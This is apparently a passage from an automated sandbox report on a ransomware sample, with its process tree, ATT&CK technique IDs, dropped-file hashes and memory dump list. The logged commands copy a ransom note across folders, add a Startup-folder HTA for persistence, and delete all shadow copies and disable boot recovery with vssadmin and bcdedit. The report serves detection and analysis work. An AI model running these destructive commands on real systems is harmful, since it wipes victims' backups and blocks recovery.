CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G Admin:F /C
6⤵
PID:1164

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
6⤵
- Views/modifies file attributes
PID:2572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MOZILL~1\updates\308046~1\WhatHappenedWithFiles.rtf"
5⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{33D1F~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{61087~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\WhatHappenedWithFiles.rtf"
5⤵
PID:2008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Default\WhatHappenedWithFiles.rtf"
5⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
5⤵
PID:2640

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G Admin:F /C
6⤵
PID:1020

C:\Windows\SysWOW64\attrib.exe
ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
6⤵
- Views/modifies file attributes
PID:3036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Public\LIBRAR~1\WhatHappenedWithFiles.rtf"
5⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" && "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
5⤵
- Loads dropped DLL
PID:2536

C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe
"C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2064

C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe
"C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:1276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\tjyu8ckN.cmd"
8⤵
PID:1684

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:1708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" && "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
5⤵
- Loads dropped DLL
PID:1628

C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe
"C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1544

C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe
"C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
7⤵
- Executes dropped EXE
- Enumerates connected drives
PID:2580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\8X2s7SDw.cmd"
8⤵
PID:1920

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
9⤵
- Runs ping.exe
PID:784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C del /f /q "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe"
5⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\N00FBW~1.HTA" > "C:\Users\Admin\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta"
5⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\N00FBW~1.HTA" > "C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta"
5⤵
- Drops file in Program Files directory
PID:2692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\OylXD3aD.cmd"
5⤵
PID:2696

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
6⤵
- Runs ping.exe
PID:2028

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\N00fBwZXjOQTTX9M.hta"
6⤵
- Modifies Internet Explorer settings
PID:2780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\9fRQNF7p.cmd"
3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
4⤵
- Runs ping.exe
PID:2980

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
PID:1808

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:2408

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:2532

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1800

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta
Filesize
3KB

MD5
ba6a676250fffbceb1014d1933e605e2

SHA1
a05b371504daffaa882f50975c80fea50ece750c

SHA256
c2b25b6af5e2b5ac4298cf5ed33c13c1ba36a61e2499a7ffca473931d529af82

SHA512
d97f73b3afb76748717969781b42fa0f03cd3601e21d30e7adbf05a4a5c09e41245bb00aed3977604d8919d09a9e7aad01bd186f8fa2fe536479bcb467e4a64d

Download Submit
C:\Users\Admin\AppData\Roaming\WhatHappenedWithFiles.rtf
Filesize
5KB

MD5
3ba34b050e66a1c6eb40b164d9872edc

SHA1
c4841110e990dcde7b5037d3359d8d0612b909b6

SHA256
f9c92cb075271b85859a34e67fb06f4a5d011546ef6e6bec0e5d0a669e627aaa

SHA512
195794ea7b35136e70504cc7d701c2d42b1d9dd43066bdd922c383f323a7acd876a14b3aeabae28bdcaf132d7820473780db68426571e576a67cc2a2c6b7f034

Download Submit
C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe
Filesize
363KB

MD5
36a0cefeb8b0a606358142d4140ea7cf

SHA1
03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f

SHA256
467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be

SHA512
63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093

Download Submit
C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\1TO4UAic.cmd
Filesize
141B

MD5
1adfcb12acc0d3236ed4e69ee3f78916

SHA1
8d5aa93668c814f0b0d350ef55ef655b05a31e69

SHA256
dd5408524cad5cedf8cf8d7ccc68ff94b545cee8a27a110780554044d8d8059b

SHA512
43cf8e1eb93ced5b6fb6195a5bf4e4ff907815ce82de0192aeae5b3e84ddc7136c8a9a9924224260ae4665192b57a4fa85aade6b1b51fd37bd773a794d692c71

Download Submit
C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\9fRQNF7p.cmd
Filesize
141B

MD5
70e41798d78ff99f023db4d3e2ad495d

SHA1
1316c3b1481f5e7e0cf61ed1d17701a6620ecd0f

SHA256
f419b969138c8966126c2866f8930ba41498ab6cfb3ed259ac3e59afe7fc41b9

SHA512
70815985783d2a87aba07cfb746810bc8ec7e59fdc1aad9eaf5af7ae1034a0cadd7d28ad85781c61fb31f3e313b4ecf9f7db387a128738c5f295976ce9a905b4

Download Submit
\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe
Filesize
3KB

MD5
b241596389982034a5a00cef15f36419

SHA1
517580a02b1d7606cac27419f787b748bebb4289

SHA256
a120506931abfdeab45fb6583e32842c90626a92d601db2f57146ee3aa64a50c

SHA512
116be5523563dc197d65380bf9f7f4ac87c147a8e09149c7777861dae974c42a1533e6ed9a2b3aec675b8ad7039b58d3d5e40fe49dc3c0a7100db2d74c11b97a

Download Submit
memory/396-456-0x0000000000648000-0x000000000068A000-memory.dmp

Filesize
264KB

Download
memory/772-162-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/840-287-0x00000000005F0000-0x00000000006F0000-memory.dmp

Filesize
1024KB

Download
memory/1144-452-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1164-457-0x00000000008E8000-0x000000000092A000-memory.dmp

Filesize
264KB

Download
memory/1276-777-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1276-785-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1544-748-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/1928-473-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1928-488-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1972-454-0x0000000000668000-0x00000000006AA000-memory.dmp

Filesize
264KB

Download
memory/2028-508-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2036-475-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2036-550-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2064-760-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2100-1-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/2240-326-0x00000000002F0000-0x00000000003F0000-memory.dmp

Filesize
1024KB

Download
memory/2256-532-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2412-31-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2484-46-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/2512-471-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2512-742-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2512-220-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2516-493-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2516-474-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2580-774-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2584-533-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2636-462-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-8-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-27-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-5-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-4-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-10-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-12-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2688-9-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-2-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-11-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2728-464-0x0000000000578000-0x00000000005BA000-memory.dmp

Filesize
264KB

Download
memory/2772-234-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2788-61-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2788-50-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2788-59-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2908-527-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2988-467-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download